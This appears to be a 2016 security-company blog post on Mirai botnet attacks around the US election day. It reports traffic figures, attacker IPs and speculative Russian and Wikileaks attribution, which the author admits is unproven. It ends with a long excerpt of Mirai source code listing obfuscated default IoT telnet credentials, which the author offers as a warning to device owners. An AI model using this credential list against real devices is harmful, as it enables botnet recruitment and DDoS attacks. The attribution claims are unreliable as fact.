The US Election and Mirai BotNetz

screen-shot-2016-11-10-at-11-32-18-am

November 8th, US Elections and the massive Sh#tstorm – Mirai

While people went to the polls and nearly killed each other on November 8 , we witnessed the biggest (seemingly coordinated) Mirai Botnet attack to the US to date. To be honest it was not as big as the 1tbs DDOS attacks we saw previously, but seemed to target the elections with an intention (assumption) to disrupt election communications. As people submitted their votes on election day,Wikileaks pushed its propaganda through more than 78,000 (Sociobots in English and Russian) about how Clinton was bad and Trump is the best thing since sliced bread. These social media flows of anti candidate (targeted ?) messaging was in full force as the east coast and interestingly (some effected areas) were swing states that were getting hammered by attacks via Mirai BotNets and various disruptions (it would seem). The attacks picked up in the morning at 9AM and continued in waves to spike up to 40Gbs (which is not 650Gbs that effected the Krebs on Security website).

Attacks got worse encompassing multiple services just like the other UDP / ICMP attacks we saw a short time ago also attributed to the Mirai Botnet (telnet and http). At its peak the attacks went up to 25 million requests / queries that went out from just over 12,000 attackers, not 100K not 1 million, just 12,000 attackers. I am sure previously some fancy schmancy companies that are “uber cybers” talked to everyone about “millions” of attackers but this just isn’t the case in reality (not dedicated attacks anyway). If we did face an attack with numbers about 20K imagine what could happen, I don’t even want to think about that really.

To understand what the Mirai Botnet poses in regards to risks, lets take a look at some simple Shodan query for telnet services that can be queried (or indexed by crawlers) in various ways (and in this case specifically using Shodan).

screen-shot-2016-11-16-at-9-57-49-am

The image above shows in which countries the results of shorans crawling services and queries show as telnet services that are visible on the internet. When we look at these numbers the total goes beyond 3 million. This does not however mean that all nodes or services discovered are all infected with Mirai Botnet payloads but the shear number of devices is pretty impressive. Now if we talk in theory that one million of these devices are infected and we have the potential for much more then we really would see a Botnet attack that is capable of much more than 1Tbs of DDOS attacking potential.

The attacks where very methodical looking at disruption rather than full take downs and interestingly often in states where voting was going on and still not in Trumps favor, was it political (I don’t have conclusive evidence of that)? The answer is I don’t know for sure and forensics is a very tedious process that can take months going through data and qualifying what exactly happened (and if that data is even complete enough). But I will continue to analyze and dissect the attack data and payloads to see where the differences are, if any specific attack strategy can be seen and proven to point in any definitive direction or threat actor(s).

An interesting finding is that the payloads from Mirai indicate Russian roots (in some cases) and also find their way to China (first signs in forums), whether the latest attacks are ONLY from there is highly unlikely because the original threat actor made sure that code was dispersed so that multiple Botnets would be built up. The 12,000 attackers also are from ASIA, EMEA and the USA so the original attackers can be in any one of these areas (we don’t have any conclusive proof from which only indicators of the origin).

 

On another note there may be some signs as to if Russia and China were at the very least part of the attacks sense we found attackers from those countries, the origin was also there and we found multiple signals that Wikileaks and Russian sponsored attacker groups were influencing Twitter and other Social Media outlets for at least the last few months. Many accounts that I tracked (Wikileaks had ca 7800 friends and 78K followers last week) to now 7612 friends and 75K+ followers. The change in numbers (seems) to indicate that SocioBots where decommissioned after the “campaign” was successful. If this is indeed true it highlights a new perspective on hybrid warfare.

Screen Shot 2016-04-19 at 10.41.22 PM

As we see in the picture above, hybrid warfare also encompasses information warfare (in Sec Clinton’s case we can see this) and also in the attacks on Nov.8 signs of Cyber Attacks. The other aspect “Propaganda” are interesting as we now have indicators that Russia used a massive SocioBot to push sediment towards Trump. Whether the evidence verifies this remains to be seen. At any rate the use of Sociobots are going to be a factor that impacts both Nation-states and commercial customers as these seem to be very effective in pushing some forms of masses in a specific direction. This also does not bode well for Democracy as it poses a threat to any nation-state or company or person that has an opinion that an attacker does not like. Its a dangerous precedent and will keep us all on our toes.

Some of the attacker IPs we found where:

Initial Attackers Seen
78.188.101.84
191.103.241.199
14.184.121.120
163.172.135.224
222.186.129.22
 1.160.40.16,
139.60.210.5
187.18.238.127
76.219.186.111
94.19.116.150
103.250.189.85
90.159.229.104
116.110.255.175
210.7.25.173
189.218.230.191

And later on some more:

additional attackers seen
118.176.67.39.
187.156.39.7
 78.188.22.8,
 121.67.41.109
59.14.187.192

using UDP, ICMP flooding as well as various DNS niceties.

This data is also in our CyberNsight System and can be collected as well as blocked from our CyberVUE sensors.

screen-shot-2016-11-09-at-12-10-50-am

(scan of one of the attackers)

Some of the networks that were attacked include T-Mobile, Sprint, Level3.

screen-shot-2016-11-09-at-12-29-43-am

(at&t)

screen-shot-2016-11-09-at-12-34-56-am

(t-mobile)

screen-shot-2016-11-09-at-12-30-36-am

(example of some hit areas)

For more information about our solutions and partners (we did not collect this information without help) please write us or contact us.

Please Note!  We work together with the most dedicated security researchers in the world, any report is a summation of dedicated and hard work from multiple individuals. I want to personally thank all Hacker Defense Network members and partners, without which this would not have been possible.

Your 1D10T

Security Noob

(as always copyright Hakdefnet 2016)

References for additional research on Mirai:

http://malwaremustdie.org

https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/

http://securityaffairs.co/wordpress/50929/malware/linux-mirai-elf.html

(example hardcoded passwords from Mirai Botnet code released by anna-senpai)

The Mirai Botnet looks for exploitable IoT devices on port 23 and compares these with known vulnerable devices that use hardcoded passwords.

I have included part of the code so that you can see which passwords it already has and is searching for. (To be clear!) I am not saying use this to breach devices but that if you are using these then chances are your device could be infected and used in DDOS attacks on others.

// Set up passwords
add_auth_entry(“\x50\x4D\x4D\x56”, “\x5A\x41\x11\x17\x13\x13”, 10); // root xc3511
add_auth_entry(“\x50\x4D\x4D\x56”, “\x54\x4B\x58\x5A\x54”, 9); // root vizxv
add_auth_entry(“\x50\x4D\x4D\x56”, “\x43\x46\x4F\x4B\x4C”, 8); // root admin
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x43\x46\x4F\x4B\x4C”, 7); // admin admin
add_auth_entry(“\x50\x4D\x4D\x56”, “\x1A\x1A\x1A\x1A\x1A\x1A”, 6); // root 888888
add_auth_entry(“\x50\x4D\x4D\x56”, “\x5A\x4F\x4A\x46\x4B\x52\x41”, 5); // root xmhdipc
add_auth_entry(“\x50\x4D\x4D\x56”, “\x46\x47\x44\x43\x57\x4E\x56”, 5); // root default
add_auth_entry(“\x50\x4D\x4D\x56”, “\x48\x57\x43\x4C\x56\x47\x41\x4A”, 5); // root juantech
add_auth_entry(“\x50\x4D\x4D\x56”, “\x13\x10\x11\x16\x17\x14”, 5); // root 123456
add_auth_entry(“\x50\x4D\x4D\x56”, “\x17\x16\x11\x10\x13”, 5); // root 54321
add_auth_entry(“\x51\x57\x52\x52\x4D\x50\x56”, “\x51\x57\x52\x52\x4D\x50\x56”, 5); // support support
add_auth_entry(“\x50\x4D\x4D\x56”, “”, 4); // root (none)
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x52\x43\x51\x51\x55\x4D\x50\x46”, 4); // admin password
add_auth_entry(“\x50\x4D\x4D\x56”, “\x50\x4D\x4D\x56”, 4); // root root
add_auth_entry(“\x50\x4D\x4D\x56”, “\x13\x10\x11\x16\x17”, 4); // root 12345
add_auth_entry(“\x57\x51\x47\x50”, “\x57\x51\x47\x50”, 3); // user user
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “”, 3); // admin (none)
add_auth_entry(“\x50\x4D\x4D\x56”, “\x52\x43\x51\x51”, 3); // root pass
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16”, 3); // admin admin1234
add_auth_entry(“\x50\x4D\x4D\x56”, “\x13\x13\x13\x13”, 3); // root 1111
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x51\x4F\x41\x43\x46\x4F\x4B\x4C”, 3); // admin smcadmin
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x13\x13\x13\x13”, 2); // admin 1111
add_auth_entry(“\x50\x4D\x4D\x56”, “\x14\x14\x14\x14\x14\x14”, 2); // root 666666
add_auth_entry(“\x50\x4D\x4D\x56”, “\x52\x43\x51\x51\x55\x4D\x50\x46”, 2); // root password
add_auth_entry(“\x50\x4D\x4D\x56”, “\x13\x10\x11\x16”, 2); // root 1234
add_auth_entry(“\x50\x4D\x4D\x56”, “\x49\x4E\x54\x13\x10\x11”, 1); // root klv123
add_auth_entry(“\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50”, “\x4F\x47\x4B\x4C\x51\x4F”, 1); // Administrator admin
add_auth_entry(“\x51\x47\x50\x54\x4B\x41\x47”, “\x51\x47\x50\x54\x4B\x41\x47”, 1); // service service
add_auth_entry(“\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50”, “\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50”, 1); // supervisor supervisor
add_auth_entry(“\x45\x57\x47\x51\x56”, “\x45\x57\x47\x51\x56”, 1); // guest guest
add_auth_entry(“\x45\x57\x47\x51\x56”, “\x13\x10\x11\x16\x17”, 1); // guest 12345
add_auth_entry(“\x45\x57\x47\x51\x56”, “\x13\x10\x11\x16\x17”, 1); // guest 12345
add_auth_entry(“\x43\x46\x4F\x4B\x4C\x13”, “\x52\x43\x51\x51\x55\x4D\x50\x46”, 1); // admin1 password
add_auth_entry(“\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50”, “\x13\x10\x11\x16”, 1); // administrator 1234
add_auth_entry(“\x14\x14\x14\x14\x14\x14”, “\x14\x14\x14\x14\x14\x14”, 1); // 666666 666666
add_auth_entry(“\x1A\x1A\x1A\x1A\x1A\x1A”, “\x1A\x1A\x1A\x1A\x1A\x1A”, 1); // 888888 888888
add_auth_entry(“\x57\x40\x4C\x56”, “\x57\x40\x4C\x56”, 1); // ubnt ubnt
add_auth_entry(“\x50\x4D\x4D\x56”, “\x49\x4E\x54\x13\x10\x11\x16”, 1); // root klv1234
add_auth_entry(“\x50\x4D\x4D\x56”, “\x78\x56\x47\x17\x10\x13”, 1); // root Zte521
add_auth_entry(“\x50\x4D\x4D\x56”, “\x4A\x4B\x11\x17\x13\x1A”, 1); // root hi3518
add_auth_entry(“\x50\x4D\x4D\x56”, “\x48\x54\x40\x58\x46”, 1); // root jvbzd
add_auth_entry(“\x50\x4D\x4D\x56”, “\x43\x4C\x49\x4D”, 4); // root anko
add_auth_entry(“\x50\x4D\x4D\x56”, “\x58\x4E\x5A\x5A\x0C”, 1); // root zlxx.
add_auth_entry(“\x50\x4D\x4D\x56”, “\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54”, 1); // root 7ujMko0vizxv
add_auth_entry(“\x50\x4D\x4D\x56”, “\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C”, 1); // root 7ujMko0admin
add_auth_entry(“\x50\x4D\x4D\x56”, “\x51\x5B\x51\x56\x47\x4F”, 1); // root system
add_auth_entry(“\x50\x4D\x4D\x56”, “\x4B\x49\x55\x40”, 1); // root ikwb
add_auth_entry(“\x50\x4D\x4D\x56”, “\x46\x50\x47\x43\x4F\x40\x4D\x5A”, 1); // root dreambox
add_auth_entry(“\x50\x4D\x4D\x56”, “\x57\x51\x47\x50”, 1); // root user
add_auth_entry(“\x50\x4D\x4D\x56”, “\x50\x47\x43\x4E\x56\x47\x49”, 1); // root realtek
add_auth_entry(“\x50\x4D\x4D\x56”, “\x12\x12\x12\x12\x12\x12\x12\x12”, 1); // root 00000000
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x13\x13\x13\x13\x13\x13\x13”, 1); // admin 1111111
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x13\x10\x11\x16”, 1); // admin 1234
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x13\x10\x11\x16\x17”, 1); // admin 12345
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x17\x16\x11\x10\x13”, 1); // admin 54321
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x13\x10\x11\x16\x17\x14”, 1); // admin 123456
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C”, 1); // admin 7ujMko0admin
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x16\x11\x10\x13”, 1); // admin 1234
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x52\x43\x51\x51”, 1); // admin pass
add_auth_entry(“\x43\x46\x4F\x4B\x4C”, “\x4F\x47\x4B\x4C\x51\x4F”, 1); // admin meinsm
add_auth_entry(“\x56\x47\x41\x4A”, “\x56\x47\x41\x4A”, 1); // tech tech
add_auth_entry(“\x4F\x4D\x56\x4A\x47\x50”, “\x44\x57\x41\x49\x47\x50”, 1); // mother f##ker